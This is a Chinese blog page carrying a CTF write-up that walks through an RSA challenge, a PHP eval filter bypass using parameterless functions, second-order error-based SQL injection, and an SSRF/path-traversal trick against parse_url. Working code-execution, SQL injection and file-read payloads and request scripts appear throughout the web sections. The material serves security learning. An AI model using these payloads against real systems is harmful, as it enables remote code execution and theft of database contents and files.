<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/tu.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/tu.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/tu.ico">
  <link rel="mask-icon" href="/images/tu.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mayi077.github.io","root":"/","scheme":"Mist","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":"ture","show_result":"ture","style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":"ture"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":"ture","mediumzoom":false,"lazyload":"ture","pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":"ture","preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言：&amp;emsp;自己还是太菜了，到现在会做的只有三道题，记录一下吧还是学到了很多新知识的。 签到题 EasyRSA&amp;emsp;可能是太菜的原因差点连签到题都没做出来。  看题目应该是 RSA 加解密了 ，题目给了2个文件。一个是密钥很明显，还有一个应该是密文了。拿去在线解密失败了。 仔细一看，密文好像是一个二进制文件，尝试将其 base64 这里我们使用python脚本如下：123import">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次 信息安全工匠工坊 比赛">
<meta property="og:url" content="https://mayi077.github.io/2020/03/28/%E8%AE%B0%E4%B8%80%E6%AC%A1-%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E5%B7%A5%E5%8C%A0%E5%B7%A5%E5%9D%8A-%E6%AF%94%E8%B5%9B/index.html">
<meta property="og:site_name" content="信安小蚂蚁">
<meta property="og:description" content="前言：&amp;emsp;自己还是太菜了，到现在会做的只有三道题，记录一下吧还是学到了很多新知识的。 签到题 EasyRSA&amp;emsp;可能是太菜的原因差点连签到题都没做出来。  看题目应该是 RSA 加解密了 ，题目给了2个文件。一个是密钥很明显，还有一个应该是密文了。拿去在线解密失败了。 仔细一看，密文好像是一个二进制文件，尝试将其 base64 这里我们使用python脚本如下：123import">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic.downk.cc/item/5e7e9a63504f4bcb04f54b72.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e7eb038504f4bcb04036695.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e7ebb56504f4bcb040bdd56.jpg">
<meta property="og:image" content="https://pic.downk.cc/item/5e8008f7504f4bcb04f23da2.jpg">
<meta property="article:published_time" content="2020-03-28T02:54:08.000Z">
<meta property="article:modified_time" content="2020-03-29T02:34:01.000Z">
<meta property="article:author" content="信安小蚂蚁">
<meta property="article:tag" content="比赛">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic.downk.cc/item/5e7e9a63504f4bcb04f54b72.jpg">

<link rel="canonical" href="https://mayi077.github.io/2020/03/28/%E8%AE%B0%E4%B8%80%E6%AC%A1-%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E5%B7%A5%E5%8C%A0%E5%B7%A5%E5%9D%8A-%E6%AF%94%E8%B5%9B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>记一次 信息安全工匠工坊 比赛 | 信安小蚂蚁</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">信安小蚂蚁</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right"></div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-主页">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>主页</a>

  </li>
        <li class="menu-item menu-item-归档">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-标签">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mayi077.github.io/2020/03/28/%E8%AE%B0%E4%B8%80%E6%AC%A1-%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E5%B7%A5%E5%8C%A0%E5%B7%A5%E5%9D%8A-%E6%AF%94%E8%B5%9B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="信安小蚂蚁">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="信安小蚂蚁">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          记一次 信息安全工匠工坊 比赛
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-03-28 10:54:08" itemprop="dateCreated datePublished" datetime="2020-03-28T10:54:08+08:00">2020-03-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-03-29 10:34:01" itemprop="dateModified" datetime="2020-03-29T10:34:01+08:00">2020-03-29</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%AF%94%E8%B5%9B/" itemprop="url" rel="index">
                    <span itemprop="name">比赛</span>
                  </a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>12 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="前言："><a href="#前言：" class="headerlink" title="前言："></a>前言：</h3><p>&emsp;自己还是太菜了，到现在会做的只有三道题，记录一下吧还是学到了很多新知识的。</p>
<h3 id="签到题-EasyRSA"><a href="#签到题-EasyRSA" class="headerlink" title="签到题 EasyRSA"></a>签到题 EasyRSA</h3><p>&emsp;可能是太菜的原因差点连签到题都没做出来。</p>
<ol>
<li>看题目应该是 RSA 加解密了 ，题目给了2个文件。一个是密钥很明显，还有一个应该是密文了。拿去在线解密失败了。</li>
<li>仔细一看，密文好像是一个二进制文件，尝试将其 base64 这里我们使用python脚本如下：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">import  base64</span><br><span class="line">with open(r&quot;C:\Users\mayi\Desktop\EasyRSA\flag.en&quot;,&quot;rb&quot;) as f:</span><br><span class="line">    print(base64.b64encode(f.read()))</span><br></pre></td></tr></table></figure>
得到:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&#39;J0lEyZGYsHOJhN0kmEr8RvNIxbKJyXRNSeqDDbiOKVXJjrCqxeiKkmKuv6QvRlIML6CcFs5yXaP70bqkQIpXQ2&#x2F;ZbcW4UGZCOdja&#x2F;mxcktbA3TxHGNcXZDh2MX7k&#x2F;MUajaJv&#x2F;FXff6kcSpjOZlfiLossZDZvpXBFTeswm0zw7+A&#x3D;&#39;</span><br></pre></td></tr></table></figure></li>
<li>再次尝试得到flag：<br><a href="https://pic.downk.cc/item/5e7e9a63504f4bcb04f54b72.jpg" target="_blank" rel="noopener"><img data-src="https://pic.downk.cc/item/5e7e9a63504f4bcb04f54b72.jpg" alt=""></a></li>
</ol>
<h3 id="WEB-1"><a href="#WEB-1" class="headerlink" title="WEB 1"></a>WEB 1</h3><p>&emsp; 题目给了源码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;var&#39;]))&#123;</span><br><span class="line">        if(&#39;;&#39; &#x3D;&#x3D;&#x3D; preg_replace(&#39;&#x2F;[^\W]+\((?R)?\)&#x2F;&#39;, &#39;&#39;, $_GET[&#39;var&#39;])) &#123;</span><br><span class="line">                if (!preg_match(&#39;&#x2F;et|dir|na|info|dec|oct|pi|log&#x2F;i&#39;, $_GET[&#39;var&#39;])) &#123;</span><br><span class="line">                    eval($_GET[&#39;var&#39;]);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            die(&quot;Sorry!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h4 id="分析："><a href="#分析：" class="headerlink" title="分析："></a>分析：</h4><ol>
<li><code>&#39;;&#39; === preg_replace(&#39;/[^\W]+\((?R)?\)/&#39;, &#39;&#39;, $_GET[&#39;var&#39;])</code> 其中<code>\W</code>表示匹配非字母数字下划线，那么<code>[^\W]</code>就是匹配字母数字下划线。再看看<code>\((?R)?\)</code> 其中 <code>(?R)?</code>意思为重复整个模式。大概理解为我我在小括号中又加了一个<code>[^\W]+\((?R)?\)</code> 无限递归下去可以为0次到n次。</li>
<li>只要我们传入的值被匹配到了，那么替换为空（不影响我们的传值，只是做判断），所以我们传入无参函数（可以递归传入）最后加个<code>;</code>即可绕过。</li>
<li><code>!preg_match(&#39;/et|dir|na|info|dec|oct|pi|log/i&#39;, $_GET[&#39;var&#39;])</code>这里过滤了些关键字。不用即可。</li>
</ol>
<h4 id="无参函数利用"><a href="#无参函数利用" class="headerlink" title="无参函数利用"></a>无参函数利用</h4><p>&emsp;其实即使只能传入无参函数，也是可以很好的利用的。</p>
<h5 id="getallheaders-利用"><a href="#getallheaders-利用" class="headerlink" title="getallheaders() 利用"></a>getallheaders() 利用</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">getallheaders()     获取全部 HTTP 请求头信息, 是下方函数的别名</span><br><span class="line">apache_request_headers  获取全部 HTTP 请求头信息</span><br><span class="line">这两个函数只适用于apache服务器</span><br></pre></td></tr></table></figure>
<p>利用方法：</p>
<ol>
<li>添加在header第一个参数<br><code>test: phpinfo();</code> payload: <code>code=eval(pos(getallheaders()));</code>  pos()可以换为current(). 如果在第二个可以使用next()</li>
<li>添加在header的最后一个：<br>payload： <code>code=eval(end(getallheaders()));</code></li>
</ol>
<h5 id="get-defined-vars-利用"><a href="#get-defined-vars-利用" class="headerlink" title="get_defined_vars() 利用"></a>get_defined_vars() 利用</h5><p>&emsp;get_defined_vars() 函数返回由所有已定义变量所组成的数组。不止apache, ngnix其他的中间键也可以用。<br>&emsp;例如： post：<code>eval(end(current(get_defined_vars())));</code><br>然后 get传： <code>text=phpinfo();</code><br>也可以这样：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">files &#x3D; &#123;</span><br><span class="line">  &quot;system(&#39;ping 127.0.0.1&#39;);&quot;: &quot;&quot;</span><br><span class="line">&#125;</span><br><span class="line">data &#x3D; &#123;</span><br><span class="line">&quot;code&quot;:&quot;eval(pos(pos(end(get_defined_vars()))));&quot;</span><br><span class="line">&#125;</span><br><span class="line">r &#x3D; requests.post(&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;code&#x2F;code.php&#39;, data&#x3D;data, files&#x3D;files)</span><br><span class="line">print(r.content.decode(&quot;utf-8&quot;, &quot;ignore&quot;))</span><br></pre></td></tr></table></figure>

<h5 id="session-id-利用"><a href="#session-id-利用" class="headerlink" title="session_id() 利用"></a>session_id() 利用</h5><p>&emsp;<code>session_id()</code> 可以用来获取/设置当前会话 ID。但是默认是们有开启的我们需要使用<code>session_start()</code>将其开启。<strong>据说只允许传入 字母数字逗号和减号</strong><br>我们可以传入16进制然后利用如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;localhost&#x2F;?code&#x3D;eval(hex2bin(session_id(session_start())));&#39;</span><br><span class="line"></span><br><span class="line">payload &#x3D;&quot;echo &#39;sky cool&#39;;&quot;.encode(&#39;hex&#39;)</span><br><span class="line"></span><br><span class="line">cookies &#x3D; &#123;</span><br><span class="line"></span><br><span class="line">&#39;PHPSESSID&#39;:payload</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">r &#x3D; requests.get(url&#x3D;url,cookies&#x3D;cookies)</span><br><span class="line"></span><br><span class="line">print (r.content)</span><br></pre></td></tr></table></figure>

<h5 id="常用-无参函数："><a href="#常用-无参函数：" class="headerlink" title="常用 无参函数："></a>常用 无参函数：</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">getchwd() 函数返回当前工作目录。</span><br><span class="line">scandir() 函数返回指定目录中的文件和目录的数组。</span><br><span class="line">dirname() 函数返回路径中的目录部分。</span><br><span class="line">chdir() 函数改变当前的目录。</span><br><span class="line"></span><br><span class="line">readfile()  输出一个文件</span><br><span class="line"></span><br><span class="line">current()       返回数组中的当前单元, 默认取第一个值</span><br><span class="line">pos()           current() 的别名</span><br><span class="line">next() 函数将内部指针指向数组中的下一个元素，并输出。</span><br><span class="line">end()       将内部指针指向数组中的最后一个元素，并输出。</span><br><span class="line">array_rand()    函数返回数组中的随机键名，或者如果您规定函数返回不只一个键名，则返回包含随机键名的数组。</span><br><span class="line">array_flip()    array_flip() 函数用于反转&#x2F;交换数组中所有的键名以及它们关联的键值。</span><br><span class="line"></span><br><span class="line">chr() 函数从指定的 ASCII 值返回字符。</span><br><span class="line">hex2bin — 转换十六进制字符串为二进制字符串</span><br><span class="line"></span><br><span class="line">getenv()        获取一个环境变量的值(在7.1之后可以不给予参数)</span><br></pre></td></tr></table></figure>

<h5 id="注意："><a href="#注意：" class="headerlink" title="注意："></a>注意：</h5><p>值得注意的是我们以上都是说的获取REC，但是一般我们直接读取文件就可以了呀。<br>一般使用的函数:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">get_file_contents</span><br><span class="line">readfile</span><br><span class="line">highlight_file</span><br></pre></td></tr></table></figure>

<h4 id="说了这么多来看题目吧"><a href="#说了这么多来看题目吧" class="headerlink" title="说了这么多来看题目吧"></a>说了这么多来看题目吧</h4><ol>
<li>题目过滤了<code>et</code>那么get就无法使用了，再加上其它的过滤。我们发现可以使用<code>session_id(session_start())</code> 。</li>
<li>再加上题目给的提示flag在<code>/flag.txt</code>中，我们使用任意文件读取。</li>
<li>使用payload: <code>readfile(session_id(session_start()));</code>  <code>Cookie: PHPSESSID=../../../../flag.txt</code> 即可得到flag<br><a href="https://pic.downk.cc/item/5e7eb038504f4bcb04036695.jpg" target="_blank" rel="noopener"><img data-src="https://pic.downk.cc/item/5e7eb038504f4bcb04036695.jpg" alt=""></a><br>有一点不太理解，不是说sessionid 不能有其它符号吗。。。。<br><a href="https://www.jianshu.com/p/7355a5ab4822" target="_blank" rel="noopener">【参考链接1】</a><br><a href="https://xz.aliyun.com/t/6316" target="_blank" rel="noopener">【参考链接2】</a></li>
</ol>
<h3 id="sqli"><a href="#sqli" class="headerlink" title="sqli"></a>sqli</h3><p>&emsp;题目提示有SQL注入，但是注入点找了很久都没找到。最后想到提供了一个改密码的功能，应该是二次注入。 </p>
<ol>
<li>尝试使用<code>&#39;abc\&quot;</code>创建一个用户（这里邮箱地址居然不能有@出现），这样可以根据改密码时判断其是<code>&#39;</code>闭合还是<code>&quot;</code>闭合。</li>
<li>登入进去，到修改密码界面尝试修改密码。发现报错:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">...right syntax to use near &#39;\&quot; and pwd&#x3D;&#39;202cb962ac59075b964b07152d234b70&#39;&#39; at line 1</span><br></pre></td></tr></table></figure>
可以看出应该是双引号闭合，且查询语句为：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where username&#x3D;&quot;&#39;abc&quot;\&quot; and pwd&#x3D;&#39;202cb962ac59075b964b07152d234b70&#39;</span><br></pre></td></tr></table></figure></li>
<li>既然如此我们可以利用报错注入，注册一个用户名为：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">abc&quot;||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema&#x3D;database()))),1))#</span><br></pre></td></tr></table></figure>
得到一个flag表，然后爆列得到一个flag列。最后使用：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">abc&quot;||(updatexml(1,concat(0x3a,(select(group_concat(flag))from(flag))),1))#</span><br></pre></td></tr></table></figure>
得到flag：<br><a href="https://pic.downk.cc/item/5e7ebb56504f4bcb040bdd56.jpg" target="_blank" rel="noopener"><img data-src="https://pic.downk.cc/item/5e7ebb56504f4bcb040bdd56.jpg" alt=""></a></li>
</ol>
<p>   其实就是,我们插入的数据没有转义存储而是直接存储了，而改密码时数据库对自己存储的数据十分放心导致的！！</p>
<h3 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h3><ol>
<li>打开链接发现，file的赋值就是显示的图片的2次base64加密。那么我们尝试访问外网无果，但是可以访问本地同目录下的文件。</li>
<li>将index.php 二次base64后赋值给file，然后得到一个无法加载的图片。复制base64部分去解密发现是源码，提示<code>Hint: hal0flagi5here.php</code>。</li>
<li>将 hal0flagi5here.php 二次base64编码后赋值给file，按上一步操作得到源码：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$argv[1]&#x3D;$_GET[&#39;url&#39;];</span><br><span class="line">if(filter_var($argv[1],FILTER_VALIDATE_URL))</span><br><span class="line">&#123;</span><br><span class="line">	$r &#x3D; parse_url($argv[1]);</span><br><span class="line">	print_r($r);</span><br><span class="line">	if(preg_match(&#39;&#x2F;happyctf\.com$&#x2F;&#39;,$r[&#39;host&#39;]))</span><br><span class="line">	&#123;</span><br><span class="line">		$url&#x3D;file_get_contents($argv[1]);</span><br><span class="line">		echo($url);</span><br><span class="line">	&#125;else</span><br><span class="line">	&#123;</span><br><span class="line">		echo(&quot;error&quot;);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;else</span><br><span class="line">&#123;</span><br><span class="line">	echo &quot;403 Forbidden&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></li>
<li>分析源码：<code>filter_var</code>要求了url的赋值必须是一个网址格式。<code>parse_url</code> 把url分成许多段，后面又判定了 host 要为<code>happyctf.com</code>。</li>
<li>可是怎么绕过得到我们想要的结果呢? 需要一个不能被解析的协议,没有被解析就被当成了一个文件夹我们就可以借机达到任意文件读取的效果。</li>
<li>payload: <code>/hal0flagi5here.php?url=mayi://happyctf.com/../../../../flag.txt</code><br><a href="https://pic.downk.cc/item/5e8008f7504f4bcb04f23da2.jpg" target="_blank" rel="noopener"><img data-src="https://pic.downk.cc/item/5e8008f7504f4bcb04f23da2.jpg" alt=""></a></li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>信安小蚂蚁
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://mayi077.github.io/2020/03/28/%E8%AE%B0%E4%B8%80%E6%AC%A1-%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E5%B7%A5%E5%8C%A0%E5%B7%A5%E5%9D%8A-%E6%AF%94%E8%B5%9B/" title="记一次 信息安全工匠工坊 比赛">https://mayi077.github.io/2020/03/28/记一次-信息安全工匠工坊-比赛/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/publicdomain/zero/1.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>ZERO</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

     <div>
       
         ﻿<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
         
      </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%AF%94%E8%B5%9B/" rel="tag"><i class="fa fa-tag"></i>比赛</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/03/27/%E5%8F%8D%E5%BC%B9shell-payload%E6%80%BB%E7%BB%93/" rel="prev" title="反弹shell payload总结">
      <i class="fa fa-chevron-left"></i> 反弹shell payload总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/03/28/V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-CHECKIN/" rel="next" title="[V&N2020 公开赛]CHECKIN">
      [V&N2020 公开赛]CHECKIN <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言："><span class="nav-number">1.</span> <span class="nav-text">前言：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#签到题-EasyRSA"><span class="nav-number">2.</span> <span class="nav-text">签到题 EasyRSA</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WEB-1"><span class="nav-number">3.</span> <span class="nav-text">WEB 1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#分析："><span class="nav-number">3.1.</span> <span class="nav-text">分析：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#无参函数利用"><span class="nav-number">3.2.</span> <span class="nav-text">无参函数利用</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#getallheaders-利用"><span class="nav-number">3.2.1.</span> <span class="nav-text">getallheaders() 利用</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#get-defined-vars-利用"><span class="nav-number">3.2.2.</span> <span class="nav-text">get_defined_vars() 利用</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#session-id-利用"><span class="nav-number">3.2.3.</span> <span class="nav-text">session_id() 利用</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#常用-无参函数："><span class="nav-number">3.2.4.</span> <span class="nav-text">常用 无参函数：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#注意："><span class="nav-number">3.2.5.</span> <span class="nav-text">注意：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#说了这么多来看题目吧"><span class="nav-number">3.3.</span> <span class="nav-text">说了这么多来看题目吧</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli"><span class="nav-number">4.</span> <span class="nav-text">sqli</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf"><span 